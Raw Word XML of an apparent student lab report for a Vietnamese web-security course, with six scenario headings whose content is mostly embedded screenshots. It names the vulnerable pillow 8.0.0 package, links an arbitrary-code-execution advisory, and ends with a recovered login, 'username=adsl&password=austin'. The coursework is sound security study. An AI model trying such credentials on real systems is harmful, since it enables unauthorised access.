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5BC6" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach" w:hint="eastAsia"/>
          <w:color w:val="002060"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="002060"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>BÁO CÁO BÀI TẬP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6FB238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Môn học: Bảo mật Web và Ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14C86A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Kỳ báo cáo: Buổi 02 (Session 01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E595B95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Tên chủ đề: Intro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051B2B24" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:jc w:val="center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GV: Nghi Hoàng Khoa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52A68B" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:jc w:val="center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Ngày báo cáo: 15/03/2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC119D" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>THÔNG TIN CHUNG:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC9C44" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720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(Liệt kê tất cả các thành viên trong nhóm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72938337" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve">Lớp: </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="bookmark=id.30j0zll"/>
      <w:bookmarkStart w:id="1" w:name="bookmark=id.1fob9te"/>
      <w:bookmarkStart w:id="2" w:name="bookmark=id.gjdgxs"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>NT213.N</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>21.ANTN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9795" w:type="dxa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248"/>
        <w:gridCol w:w="2411"/>
        <w:gridCol w:w="3298"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C5BFB" w14:paraId="114F50FB" w14:textId="77777777" w:rsidTr="006C5BFB">
        <w:trPr>
          <w:trHeight w:val="70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01DBCC2" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="624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STT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FDF27FC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Họ và tê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F0DA94B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MSSV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A24654E" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="1452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Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C5BFB" w14:paraId="04FED771" w14:textId="77777777" w:rsidTr="006C5BFB">
        <w:trPr>
          <w:trHeight w:val="2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7963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9A63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Võ Anh Kiệ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67C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2052060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89D0" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs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20520605@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C5BFB" w14:paraId="08647416" w14:textId="77777777" w:rsidTr="006C5BFB">
        <w:trPr>
          <w:trHeight w:val="4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CC96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7BB8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AE4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5FFE" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10C6172F" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A74197A" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NỘI DUNG THỰC HIỆN:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteReference w:id="1"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="99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4278"/>
        <w:gridCol w:w="2550"/>
        <w:gridCol w:w="2391"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C5BFB" w14:paraId="000AE5A3" w14:textId="77777777" w:rsidTr="006C5BFB">
        <w:trPr>
          <w:trHeight w:val="23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73022805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STT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34C64BB1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Công việ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36529327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Kết quả tự đánh giá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8E40E72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Người đóng góp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C5BFB" w14:paraId="20168BC4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56DC" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB">
            <w:pPr>
              <w:jc w:val="center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1C0C" w14:textId="51980AAA" w:rsidR="006C5BFB" w:rsidRDefault="000F297F">
            <w:pPr>
              <w:jc w:val="both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 xml:space="preserve">13 </w:t>
            </w:r>
            <w:r w:rsidR="006C5BFB">
              <w:rPr>
                <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
              </w:rPr>
              <w:t>Kịch bả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F5F0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E284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2B3D5CE9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9F51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BA58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C98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08E7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7E776EEB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2C0F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3E59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C2C3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7202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5BB63E74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366A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62E4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8B42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94A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0E4D0381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C86C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C0BC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C8B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0EF1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</w:tbl>
    <w:p w14:paraId="3B8C1812" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08844AD3" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr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Phần bên dưới của báo cáo này là tài liệu báo cáo chi tiết của nhóm thực hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563743C9" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21306CA2" w14:textId="77777777" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="006C5BFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7B829F" w14:textId="04CAAE6C" w:rsidR="006C5BFB" w:rsidRDefault="006C5BFB" w:rsidP="000F297F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="360"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>BÁO CÁO CHI TIẾT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E920DFE" w14:textId="044D1687" w:rsidR="000F297F" w:rsidRDefault="000F297F" w:rsidP="000F297F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C65F2D1" w14:textId="37183674" w:rsidR="000F297F" w:rsidRDefault="000F297F" w:rsidP="000F297F"/>
    <w:p w14:paraId="36EDC9CC" w14:textId="6C061717" w:rsidR="000F297F" w:rsidRDefault="00F86ADA" w:rsidP="000F297F">
      <w:r w:rsidRPr="00F86ADA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33A0AD15" wp14:editId="37986276">
            <wp:extent cx="6115050" cy="3804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A194" w14:textId="4D486B7D" w:rsidR="00F86ADA" w:rsidRDefault="00F86ADA" w:rsidP="000F297F">
      <w:r w:rsidRPr="00F86ADA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2875682A" wp14:editId="08A48976">
            <wp:extent cx="6115050" cy="3862070"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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6902" w14:textId="37510786" w:rsidR="00F86ADA" w:rsidRDefault="00F86ADA" w:rsidP="000F297F">
      <w:r w:rsidRPr="00F86ADA">
        <w:t>pillow==8.0.0 package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C34EA" w14:textId="023259B3" w:rsidR="00F86ADA" w:rsidRDefault="00000000" w:rsidP="000F297F">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00F86ADA" w:rsidRPr="009123DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sca.analysiscenter.veracode.com/vulnerability-database/security/arbitrary-code-execution/python/sid-22250</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="734CA63B" w14:textId="7D058F82" w:rsidR="00F86ADA" w:rsidRDefault="00F86ADA" w:rsidP="000F297F">
      <w:r w:rsidRPr="00F86ADA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53C61261" wp14:editId="0F885A86">
            <wp:extent cx="6115050" cy="3868420"/>
            <wp:effectExtent l="0" t="0" r="0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5D58" w14:textId="3669A9FF" w:rsidR="00F86ADA" w:rsidRDefault="00F86ADA" w:rsidP="000F297F">
      <w:r w:rsidRPr="00F86ADA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EAB5E67" wp14:editId="79502FA5">
            <wp:extent cx="6115050" cy="3271520"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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A991" w14:textId="57E2074F" w:rsidR="000F297F" w:rsidRDefault="000F297F" w:rsidP="000F297F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5578913B" w14:textId="50C7C43A" w:rsidR="00F22279" w:rsidRDefault="00F22279" w:rsidP="000F297F"/>
    <w:p w14:paraId="1ABFC342" w14:textId="29E5A8B2" w:rsidR="009861DD" w:rsidRDefault="009861DD" w:rsidP="000F297F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="227CCDA2" wp14:editId="3A9D0DB7">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="75243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00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DD5" w14:textId="24E44263" w:rsidR="009861DD" w:rsidRDefault="009861DD" w:rsidP="000F297F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63D39A11" wp14:editId="481F8185">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="368813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1303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37AF" w14:textId="15E6A4C7" w:rsidR="009861DD" w:rsidRDefault="009861DD" w:rsidP="000F297F">
      <w:r w:rsidRPr="009861DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B976B11" wp14:editId="28F89E86">
            <wp:extent cx="6115050" cy="1346835"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="12255566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56694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254F" w14:textId="18074E0F" w:rsidR="00F456AC" w:rsidRDefault="00F456AC" w:rsidP="000F297F">
      <w:r w:rsidRPr="00F456AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B4A4CF8" wp14:editId="4D5EA11D">
            <wp:extent cx="6115050" cy="446405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63847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77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B79" w14:textId="484D9C56" w:rsidR="009861DD" w:rsidRDefault="009861DD" w:rsidP="000F297F">
      <w:r w:rsidRPr="009861DD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2266062F" wp14:editId="2C8F26DF">
            <wp:extent cx="6115050" cy="1598295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="18716713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1320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25F" w14:textId="38259537" w:rsidR="00F456AC" w:rsidRDefault="00F456AC" w:rsidP="000F297F">
      <w:r w:rsidRPr="00F456AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14DA3154" wp14:editId="0FC50F3F">
            <wp:extent cx="6115050" cy="504190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107089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4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FF5" w14:textId="4DC97779" w:rsidR="009861DD" w:rsidRDefault="009861DD" w:rsidP="000F297F"/>
    <w:p w14:paraId="44F94555" w14:textId="77777777" w:rsidR="009861DD" w:rsidRDefault="009861DD" w:rsidP="000F297F"/>
    <w:p w14:paraId="413400BD" w14:textId="605F3732" w:rsidR="009861DD" w:rsidRDefault="009861DD" w:rsidP="000F297F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FD550AE" wp14:editId="5298F3A4">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1793806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069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0BAC" w14:textId="6635FC44" w:rsidR="000F297F" w:rsidRDefault="000F297F" w:rsidP="000F297F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC471F0" w14:textId="77777777" w:rsidR="00F22279" w:rsidRDefault="00F22279" w:rsidP="00F22279">
      <w:r w:rsidRPr="00F22279">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE1436C" wp14:editId="7FE48130">
            <wp:extent cx="6115050" cy="354330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762" w14:textId="77777777" w:rsidR="00F22279" w:rsidRDefault="00F22279" w:rsidP="00F22279">
      <w:r w:rsidRPr="00F22279">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C3D117C" wp14:editId="4DD4B669">
            <wp:extent cx="6115050" cy="2508250"/>
            <wp:effectExtent l="0" t="0" r="0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CE7" w14:textId="5F62BE09" w:rsidR="00F22279" w:rsidRDefault="00F22279" w:rsidP="00F22279"/>
    <w:p w14:paraId="6A214DC9" w14:textId="5518BB8E" w:rsidR="00846DE3" w:rsidRDefault="00846DE3" w:rsidP="00F22279">
      <w:r w:rsidRPr="00846DE3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3805EF1B" wp14:editId="680CFB7C">
            <wp:extent cx="6115050" cy="1664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BED" w14:textId="77777777" w:rsidR="00846DE3" w:rsidRDefault="00846DE3" w:rsidP="00F22279"/>
    <w:p w14:paraId="28A93EF7" w14:textId="77777777" w:rsidR="00F22279" w:rsidRDefault="00F22279" w:rsidP="00F22279">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7466B76D" wp14:editId="2397D646">
            <wp:extent cx="6115050" cy="3439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A24E" w14:textId="27CD5826" w:rsidR="000F297F" w:rsidRDefault="000F297F" w:rsidP="000F297F"/>
    <w:p w14:paraId="0BBB77CF" w14:textId="77777777" w:rsidR="000F297F" w:rsidRDefault="000F297F" w:rsidP="000F297F"/>
    <w:p w14:paraId="33864FD9" w14:textId="46AAF6DD" w:rsidR="000F297F" w:rsidRPr="000F297F" w:rsidRDefault="000F297F" w:rsidP="000F297F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3FE613" w14:textId="2301E7CF" w:rsidR="000F297F" w:rsidRDefault="000F297F" w:rsidP="000F297F"/>
    <w:p w14:paraId="1B26B955" w14:textId="6F8140B9" w:rsidR="00846DE3" w:rsidRDefault="00846DE3" w:rsidP="000F297F"/>
    <w:p w14:paraId="4C9CDDE9" w14:textId="77777777" w:rsidR="006611BC" w:rsidRDefault="006611BC" w:rsidP="000F297F"/>
    <w:p w14:paraId="2A92531C" w14:textId="41484878" w:rsidR="00846DE3" w:rsidRDefault="00846DE3" w:rsidP="00846DE3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Kịch bản 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11083A" w14:textId="61754A5F" w:rsidR="00846DE3" w:rsidRDefault="00846DE3" w:rsidP="00846DE3"/>
    <w:p w14:paraId="6BB30C48" w14:textId="5805E8FF" w:rsidR="00846DE3" w:rsidRDefault="00573C9B" w:rsidP="00846DE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DEAAD5C" wp14:editId="0AC55546">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="5208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6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7459" w14:textId="29BC72F2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3D9284C2" wp14:editId="41122381">
            <wp:extent cx="6115050" cy="4791075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="208800930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0930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75" w14:textId="5390C920" w:rsidR="00846DE3" w:rsidRDefault="00573C9B" w:rsidP="00846DE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DFF49A1" wp14:editId="08417E23">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="52268980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89807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A43E" w14:textId="15547F0F" w:rsidR="00573C9B" w:rsidRDefault="004D6DC5" w:rsidP="00846DE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21F48CED" wp14:editId="27FC42A1">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="98507251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2519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2762" w14:textId="2566244E" w:rsidR="004D6DC5" w:rsidRDefault="004D6DC5" w:rsidP="00846DE3">
      <w:r w:rsidRPr="004D6DC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="733F1F13" wp14:editId="5D47C53A">
            <wp:extent cx="6115050" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="761395386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5386" name="Picture 1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7CD5" w14:textId="4B116319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751387D3" wp14:editId="3866BA4D">
            <wp:extent cx="6115050" cy="4064635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="138195850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58502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AD" w14:textId="51185A5E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3EA9915F" wp14:editId="649077E5">
            <wp:extent cx="6115050" cy="5069840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20311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0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B805" w14:textId="1B06FEDF" w:rsidR="00E23DA3" w:rsidRDefault="00E23DA3" w:rsidP="00846DE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="766C7A97" wp14:editId="105C4069">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="180323061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0615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E54" w14:textId="3F3349C3" w:rsidR="00846DE3" w:rsidRPr="00846DE3" w:rsidRDefault="00846DE3" w:rsidP="00846DE3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kịch bản 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4847F3" w14:textId="72FD30D5" w:rsidR="00E23DA3" w:rsidRDefault="00E23DA3" w:rsidP="00E23DA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7647495F" w14:textId="258212F5" w:rsidR="00E23DA3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2DB97455" wp14:editId="505344C5">
            <wp:extent cx="6115050" cy="3025140"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="593630266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0266" name="Picture 1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F3C" w14:textId="3E3B1630" w:rsidR="00E065D6" w:rsidRDefault="00E065D6" w:rsidP="00E23DA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCEFB69" w14:textId="15357750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72AEB7C9" wp14:editId="2138A598">
            <wp:extent cx="6115050" cy="3629025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="183091673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6736" name="Picture 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E94A" w14:textId="05B8A2B0" w:rsidR="00E065D6" w:rsidRDefault="00E065D6" w:rsidP="00E23DA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1745F582" w14:textId="0C17EFDB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0AB4E0D0" wp14:editId="58212F14">
            <wp:extent cx="3353268" cy="476316"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="367972759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72759" name="Picture 1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5304" w14:textId="521284A7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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30129D84" wp14:editId="2C1AB356">
            <wp:extent cx="6115050" cy="3108960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1694147502" name="Picture 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47502" name="Picture 1" descr="Graphical user interface, tabl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EEBC" w14:textId="3C3276DC" w:rsidR="00E10803" w:rsidRDefault="00E10803" w:rsidP="00E23DA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2913D11F" w14:textId="4E369592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2FD1628D" wp14:editId="0628234B">
            <wp:extent cx="6115050" cy="4987290"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="214173436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4365" name="Picture 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056" w14:textId="7224728F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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DD3B5B6" wp14:editId="1DEEEDC5">
            <wp:extent cx="3296110" cy="438211"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="158262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226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C98A" w14:textId="7706B36E" w:rsidR="00E065D6" w:rsidRDefault="00C9190A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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CBD82E3" wp14:editId="6951C096">
            <wp:extent cx="6115050" cy="3456305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108300949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9491" name="Picture 1" descr="Graphical user interface,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772C" w14:textId="5270E4DE" w:rsidR="00E10803" w:rsidRDefault="00E10803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  <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5008FF26" wp14:editId="7CE21F94">
            <wp:extent cx="6115050" cy="4968240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="83851692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16921" name="Picture 1" descr="Graphical user interface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83E8" w14:textId="6B21B22C" w:rsidR="00C9190A" w:rsidRDefault="00C9190A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</w:rPr>
        <w:t>username=adsl&amp;password=austin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BD299D" w14:textId="41A323D9" w:rsidR="00C9190A" w:rsidRDefault="00C9190A" w:rsidP="00E23DA3">
      <w:pPr>
        <w:rPr>
